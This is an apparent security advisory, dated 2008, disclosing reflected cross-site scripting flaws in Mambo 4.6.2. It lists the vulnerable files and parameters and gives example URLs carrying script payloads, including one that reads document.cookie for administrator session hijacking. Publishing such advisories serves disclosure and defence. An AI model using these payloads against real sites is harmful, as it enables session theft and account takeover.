Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani

2008.08.20
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

---------------------------------------------------------------- Script : Mambo 4.6.2 Full & Older Versions Type : Multiple Cross Site Scripting Vulnerabilities Alert Level : Medium ---------------------------------------------------------------- Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip ---------------------------------------------------------------- Discovered by : Khashayar Fereidani My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Cross Site Scripting Vulnerability 1 : Vulnerable File : administrator/popups/index3pop.php Vulnerable Line (5) : <title><?php echo $mosConfig_sitename; ?> - Administration [Mambo]</title> Vulnerable Variable : mosConfig_sitename For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=</t itle><script>alert(document.cookie)</script> Attacker can hijack administrator cookie and session and login with they ---------------------------------------------------------------- Cross Site Scripting Vulnerability 2 : Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/co nnector.php? Vulnable Variable : Any Variable - You can set any variable .... For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/co nnectors/php/connector.php?khashayar=<script>alert('xss')</script> you can set cross site scripting code in variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/co nnectors/php/connector.php?<script>alert('xss')</script>=Hello+Word ---------------------------------------------------------------- Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR ----------------------------------------------------------------

References:

http://www.securityfocus.com/archive/1/archive/1/495507/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top